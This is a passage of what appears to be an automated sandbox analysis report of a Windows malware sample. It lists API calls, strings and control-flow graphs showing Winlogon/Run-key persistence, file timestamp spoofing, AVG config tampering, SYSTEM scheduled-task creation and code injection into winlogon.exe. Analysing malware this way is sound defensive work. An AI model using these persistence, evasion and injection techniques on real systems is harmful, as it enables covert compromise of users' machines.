                                                                                                                                                                                                                • Part of subcall function 00401E00: FindCloseChangeNotification.KERNEL32(0040104F), ref: 00401E86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000), ref: 004010F6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 00401129
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorToken$ChangeCloseCurrentFindNotificationOpenProcessThread$AdjustConvertCreateErrorFreeHandleInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1779852708-820036962
                                                                                                                                                                                                              • Opcode ID: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                              • Instruction ID: 0b24c45107c0befc32dd0ff84bd5674d64e160e2b6de00103b139920790b26b7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 874152B5600208BBE7209B94DD49FAF7BBDEB89741F144026FB04FA2D0D7B49941C7A8
                                                                                                                                                                                                              Function 00402930 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 106registryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 262 402930-40296f RegCreateKeyExA 263 402975-4029d9 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA _snprintf 262->263 264 4029fd-402a1e RegCreateKeyExA 262->264 265 4029e0-4029e5 263->265 266 402a20-402a22 264->266 267 402a44-402a4a 264->267 265->265 268 4029e7-4029fb 265->268 269 402a25-402a2a 266->269 270 402a4c-402a57 RegFlushKey RegCloseKey 267->270 271 402a5d-402a60 267->271 272 402a3e RegSetValueExA 268->272 269->269 273 402a2c-402a3d 269->273 270->271 272->267 273->272
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCreateKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040296B
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402986
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 00402993
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 004029B0
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 004029CB
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 00402A1A
                                                                                                                                                                                                              • RegSetValueExA.KERNEL32(00000000,userinit,00000000,00000001,?,?), ref: 00402A3E
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(00000000), ref: 00402A4D
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402A57
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • SystemDrive, xrefs: 00402981
                                                                                                                                                                                                              • userinit, xrefs: 00402A38
                                                                                                                                                                                                              • software\microsoft\windows\currentversion\run, xrefs: 00402A10
                                                                                                                                                                                                              • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402953
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
                                                                                                                                                                                                              • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 3547530944-2324515132
                                                                                                                                                                                                              • Opcode ID: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                              • Instruction ID: cfc36ad3083988d5491cb46672b4500e56a1c5dd6b6f1e6a0940d5df759a06a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F93147B5740305BBE720DB54DE4AFEA777CDB95B00F204155FB44BA1C0DAF4AA448BA8
                                                                                                                                                                                                              Function 004014B0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 93processstringCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 349 4014b0-401531 memset * 2 lstrcpynA CreateProcessA 350 401533-401543 349->350 351 40158f-401597 349->351 352 401545-40154e GetHandleInformation 350->352 353 40155d-401567 350->353 352->353 356 401550-401554 352->356 354 401581-40158c 353->354 355 401569-401572 GetHandleInformation 353->355 355->354 357 401574-401578 355->357 356->353 358 401556-401557 CloseHandle 356->358 357->354 359 40157a-40157b CloseHandle 357->359 358->353 359->354
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004014C8
                                                                                                                                                                                                              • memset.MSVCRT ref: 004014EE
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,00402CFF,00000104,?,?,?,00000000,00000000,00000000), ref: 00401506
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00401529
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040154A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00401557
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040156E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040157B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                              • API String ID: 2248944234-2746444292
                                                                                                                                                                                                              • Opcode ID: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                              • Instruction ID: 14e7369bd1a15e27c4b274561f890c179ee839510f861d06d6d7e351d84cbd4c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF2167B290020C6FDB10DFE8DD84ADF7BBCAB94355F00457AFA05FA240D6349A458BA4
                                                                                                                                                                                                              Function 00401BE0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76filetimeCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 360 401be0-401c0c CreateFileA 361 401c12-401c2e GetFileTime 360->361 362 401ca5-401caa 360->362 363 401c30-401c3d GetHandleInformation 361->363 364 401c4c-401c69 CreateFileA 361->364 363->364 365 401c3f-401c43 363->365 364->362 366 401c6b-401c87 SetFileTime 364->366 365->364 367 401c45-401c46 CloseHandle 365->367 366->362 368 401c89-401c96 GetHandleInformation 366->368 367->364 368->362 369 401c98-401c9c 368->369 369->362 370 401c9e-401c9f CloseHandle 369->370 370->362
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C05
                                                                                                                                                                                                              • GetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?,?,?), ref: 00401C1F
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C35
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C46
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C62
                                                                                                                                                                                                              • SetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?), ref: 00401C78
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C8E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C9F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401C00
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHandle$CloseCreateInformationTime
                                                                                                                                                                                                              • String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys
                                                                                                                                                                                                              • API String ID: 1046229350-2760794270
                                                                                                                                                                                                              • Opcode ID: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                              • Instruction ID: 0895f171d82555aaaa5436e0262d4f4d844cfaf0768df501368bcb823c663742
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE21F9729452187BF7219B50DD09FEF7B6CAF44710F148226FF01B61D0D778964586AC
                                                                                                                                                                                                              Function 004012B0 Relevance: 13.6, APIs: 9, Instructions: 66fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(00401CB0,?,0000001C), ref: 004012DF
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004012F5
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 00401302
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401319
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 00401331
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0040134D
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040135C
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 00401369
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040137D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2787354276-0
                                                                                                                                                                                                              • Opcode ID: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                              • Instruction ID: 42c1c782f055159cc2832ed009bcca8814697c7b1d580040d5fe2fedb3335bbb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D921CFB1950219AFEB10DBA0DD49FEA77BCFB48700F0046A9A709F6190E6749A44CFA4
                                                                                                                                                                                                              Function 00402450 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402468
                                                                                                                                                                                                              • MoveFileA.KERNEL32(?,?), ref: 0040252F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFolderMovePath
                                                                                                                                                                                                              • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                              • API String ID: 1404575960-1083204512
                                                                                                                                                                                                              • Opcode ID: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                              • Instruction ID: 6a3b38723654ace9b65cd78b9e90850702c138762b68f8666c7e3f81cfb55a8f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35215EB45042448FC719DF14EA98B92BBE1FB89300F1581B9DA88A73B2D6B0D944CF98
                                                                                                                                                                                                              Function 0040219A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004021AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                              • String ID: v-@
                                                                                                                                                                                                              • API String ID: 3664257935-4190885519
                                                                                                                                                                                                              • Opcode ID: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                              • Instruction ID: 659d1c44b33988b11b994a6559d152e96ecfdb185b9268fc6ed29e1105b0769f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34D05E76E01629CBCB21DF94A5052AEF730FB44731F0043AADE247338083351C118AD5

                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                              Function 00403560 Relevance: 66.9, APIs: 32, Strings: 6, Instructions: 368memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035AE
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035CE
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035EE
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 004035F6
                                                                                                                                                                                                              • GetVersionExA.KERNEL32 ref: 00403611
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                                • Part of subcall function 004034C0: OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                                • Part of subcall function 004034C0: CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403655
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040366E
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,7604DB30), ref: 004036CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7604DB30), ref: 00403717
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,7604DB30), ref: 0040371E
                                                                                                                                                                                                              • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • task%d, xrefs: 0040365C
                                                                                                                                                                                                              • 00-->, xrefs: 0040383F
                                                                                                                                                                                                              • <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 00403574
                                                                                                                                                                                                              • p=<u, xrefs: 0040394B
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\tasks\, xrefs: 00403597
                                                                                                                                                                                                              • <Actions , xrefs: 0040380A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
                                                                                                                                                                                                              • String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$p=<u$task%d
                                                                                                                                                                                                              • API String ID: 1601901853-1711019342
                                                                                                                                                                                                              • Opcode ID: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                              • Instruction ID: 3d176fac64e71e3d45e4d3c7787755692d466ba94461fa4e5093d4db6fcc502b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76D1E1B2504301ABD720DF64CC49F5B7BA8EFC8715F044A2AFA49B7291D774EA04CB99
                                                                                                                                                                                                              Function 004018E0 Relevance: 52.7, APIs: 29, Strings: 1, Instructions: 234memoryprocessCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,759A5430,00000000,?), ref: 00401923
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401963
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                              • memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                              • CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ByteCharMultiWide$memset$AllocFreeValidate$CreateLogonWith
                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                              • API String ID: 3422789474-2746444292
                                                                                                                                                                                                              • Opcode ID: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                              • Instruction ID: 871197f746f8751ebb4c77b71a3ee3543858eb92964eac2fec8a8f15daba1beb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D861D8B1A013157BDB209FA69C48FAB7B6CEF84750F15412AFA18B72D0DA749900CFB4
                                                                                                                                                                                                              Function 00401670 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 215injectionlibrarymemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00401CF0: memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D27
                                                                                                                                                                                                                • Part of subcall function 00401CF0: GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                                • Part of subcall function 00401CF0: SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                                • Part of subcall function 00401CF0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,00000000,?,7604DB30,00402F58,winlogon.exe), ref: 0040169D
                                                                                                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,7604DB30,00402F58,winlogon.exe), ref: 004016BC
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004016DB
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004016F1
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000), ref: 004016FD
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401718
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401728
                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040176F
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 00401791
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004017BD
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 004017D8
